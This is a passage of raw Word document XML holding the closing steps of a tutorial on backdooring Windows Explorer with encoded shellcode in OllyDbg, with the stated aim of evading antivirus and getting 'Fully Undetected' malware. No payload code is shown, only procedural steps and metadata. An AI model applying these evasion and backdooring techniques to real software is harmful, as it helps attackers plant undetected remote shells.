          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>l the shellcode should all be</w:t>
      </w:r>
      <w:r w:rsidR="00C37295">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoded now, but we need to help Olly realize that by right clicking on the code and select analysis -&gt; analyze code</w:t>
      </w:r>
      <w:r w:rsidR="00A90DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">.  The code should change, and its time to save all the </w:t>
      </w:r>
      <w:r w:rsidR="004B3999">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>hard work</w:t>
      </w:r>
      <w:r w:rsidR="00A90DD5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.  Right click, copy to executable -&gt; all modification</w:t>
      </w:r>
      <w:r w:rsidR="004B3999">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.  And right click, save file.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ADDC17" w14:textId="77777777" w:rsidR="00884E0C" w:rsidRPr="00CE241A" w:rsidRDefault="00884E0C" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E13D4A" w14:textId="0E5C5785" w:rsidR="00884E0C" w:rsidRDefault="009E66DC" w:rsidP="001258AC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6E70F3FD" wp14:editId="18F872E4">
            <wp:extent cx="5476240" cy="2611120"/>
            <wp:effectExtent l="0" t="0" r="10160" b="5080"/>
            <wp:docPr id="6" name="Picture 4" descr="MyShit:Users:mee:Desktop:img:fi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hit:Users:mee:Desktop:img:fin.tif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F3B39" w14:textId="77777777" w:rsidR="00453D0D" w:rsidRDefault="00453D0D" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8FD737" w14:textId="24E750D1" w:rsidR="00453D0D" w:rsidRPr="00CE241A" w:rsidRDefault="0017439D" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Both programs are happily working together on the same process</w:t>
      </w:r>
      <w:r w:rsidR="00453D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E055FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>but this is probably a bad idea</w:t>
      </w:r>
      <w:r w:rsidR="00453D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to backdoor a process</w:t>
      </w:r>
      <w:r w:rsidR="00E055FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00453D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Explorer</w:t>
      </w:r>
      <w:r w:rsidR="00E055FD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. From the image, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I can see a suspicious CMD</w:t>
      </w:r>
      <w:r w:rsidR="00453D0D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell hanging from the process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, so say goodbye to stealth </w:t>
      </w:r>
      <w:r w:rsidRPr="0017439D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F04A"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF099B9" w14:textId="77777777" w:rsidR="002F65A6" w:rsidRDefault="002F65A6" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075B28C8" w14:textId="738811DC" w:rsidR="00227B9A" w:rsidRDefault="00227B9A" w:rsidP="001258AC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BFAF997" wp14:editId="084FAC0D">
            <wp:extent cx="5486400" cy="4104640"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:docPr id="7" name="Picture 5" descr="MyShit:Users:mee:Desktop:img:vir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hit:Users:mee:Desktop:img:vir.tif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2C64" w14:textId="77777777" w:rsidR="00227B9A" w:rsidRDefault="00227B9A" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280DE1C1" w14:textId="5E242B0F" w:rsidR="00227B9A" w:rsidRPr="00CE241A" w:rsidRDefault="001528BA" w:rsidP="001258AC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That was a lot of work, but at least </w:t>
      </w:r>
      <w:r w:rsidR="00942B10">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00942B10">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">another </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">way to bypass AV, and </w:t>
      </w:r>
      <w:r w:rsidR="00643924">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">I think </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>there’s more possibility to get FUD (Fully Undetected) with this approach</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00227B9A" w:rsidRPr="00CE241A" w:rsidSect="00E0132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85783E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69988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3A5CD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69988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242443"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69988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4D39BC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="69988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035"/>
    <w:rsid w:val="0001707B"/>
    <w:rsid w:val="0003426F"/>
    <w:rsid w:val="000362B7"/>
    <w:rsid w:val="00042AEE"/>
    <w:rsid w:val="00053D3A"/>
    <w:rsid w:val="00063CA1"/>
    <w:rsid w:val="00064500"/>
    <w:rsid w:val="000E6CCC"/>
    <w:rsid w:val="001258AC"/>
    <w:rsid w:val="00150BD4"/>
    <w:rsid w:val="001528BA"/>
    <w:rsid w:val="0015564E"/>
    <w:rsid w:val="0017439D"/>
    <w:rsid w:val="001B3F62"/>
    <w:rsid w:val="001C3CA9"/>
    <w:rsid w:val="00214DA6"/>
    <w:rsid w:val="00224A99"/>
    <w:rsid w:val="00227B9A"/>
    <w:rsid w:val="00293C32"/>
    <w:rsid w:val="002F65A6"/>
    <w:rsid w:val="003126EA"/>
    <w:rsid w:val="003D2FE6"/>
    <w:rsid w:val="00427035"/>
    <w:rsid w:val="00440F49"/>
    <w:rsid w:val="00453D0D"/>
    <w:rsid w:val="0046599F"/>
    <w:rsid w:val="004737A2"/>
    <w:rsid w:val="004850B7"/>
    <w:rsid w:val="004B3999"/>
    <w:rsid w:val="004B67AD"/>
    <w:rsid w:val="004D51AF"/>
    <w:rsid w:val="005467C0"/>
    <w:rsid w:val="00546879"/>
    <w:rsid w:val="00565D8C"/>
    <w:rsid w:val="005665B1"/>
    <w:rsid w:val="005910A8"/>
    <w:rsid w:val="005A1B5C"/>
    <w:rsid w:val="005B59EB"/>
    <w:rsid w:val="005B6877"/>
    <w:rsid w:val="005E4E00"/>
    <w:rsid w:val="006000D9"/>
    <w:rsid w:val="00641AE6"/>
    <w:rsid w:val="00643924"/>
    <w:rsid w:val="0065444F"/>
    <w:rsid w:val="006C51CA"/>
    <w:rsid w:val="006F72E2"/>
    <w:rsid w:val="006F7445"/>
    <w:rsid w:val="0079114E"/>
    <w:rsid w:val="007F1FF1"/>
    <w:rsid w:val="00812E18"/>
    <w:rsid w:val="00823F3C"/>
    <w:rsid w:val="008247BE"/>
    <w:rsid w:val="00870AE2"/>
    <w:rsid w:val="00873CAC"/>
    <w:rsid w:val="00884E0C"/>
    <w:rsid w:val="008F70E5"/>
    <w:rsid w:val="00931940"/>
    <w:rsid w:val="00942B10"/>
    <w:rsid w:val="00946D62"/>
    <w:rsid w:val="00953B11"/>
    <w:rsid w:val="009D6307"/>
    <w:rsid w:val="009E66DC"/>
    <w:rsid w:val="00A245B5"/>
    <w:rsid w:val="00A53B3E"/>
    <w:rsid w:val="00A90DD5"/>
    <w:rsid w:val="00A97920"/>
    <w:rsid w:val="00AC1A6F"/>
    <w:rsid w:val="00B2460B"/>
    <w:rsid w:val="00B34757"/>
    <w:rsid w:val="00B9697B"/>
    <w:rsid w:val="00BE1B4F"/>
    <w:rsid w:val="00C25A7E"/>
    <w:rsid w:val="00C37295"/>
    <w:rsid w:val="00C43034"/>
    <w:rsid w:val="00C5655F"/>
    <w:rsid w:val="00CA363B"/>
    <w:rsid w:val="00CA7223"/>
    <w:rsid w:val="00CB6989"/>
    <w:rsid w:val="00CD5E26"/>
    <w:rsid w:val="00CE241A"/>
    <w:rsid w:val="00CE7C8C"/>
    <w:rsid w:val="00CF18BB"/>
    <w:rsid w:val="00D21DA8"/>
    <w:rsid w:val="00D62995"/>
    <w:rsid w:val="00E01321"/>
    <w:rsid w:val="00E055FD"/>
    <w:rsid w:val="00E40848"/>
    <w:rsid w:val="00E40949"/>
    <w:rsid w:val="00E571E5"/>
    <w:rsid w:val="00E866A7"/>
    <w:rsid w:val="00E93E89"/>
    <w:rsid w:val="00EE0778"/>
    <w:rsid w:val="00F50A28"/>
    <w:rsid w:val="00F91A91"/>
    <w:rsid w:val="00F96F59"/>
    <w:rsid w:val="00FC7386"/>
    <w:rsid w:val="00FD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13277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0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5A7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A7E"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs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E24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241A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier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03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5A7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A7E"/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Grande" w:hAnsi="Lucida Grande" w:cs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E24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241A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9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6</Pages>
  <Words>650</Words>
  <Characters>3705</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>30</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>co</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4347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 mee</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mee mee</cp:lastModifiedBy>
  <cp:revision>74</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-03T18:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-04T03:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>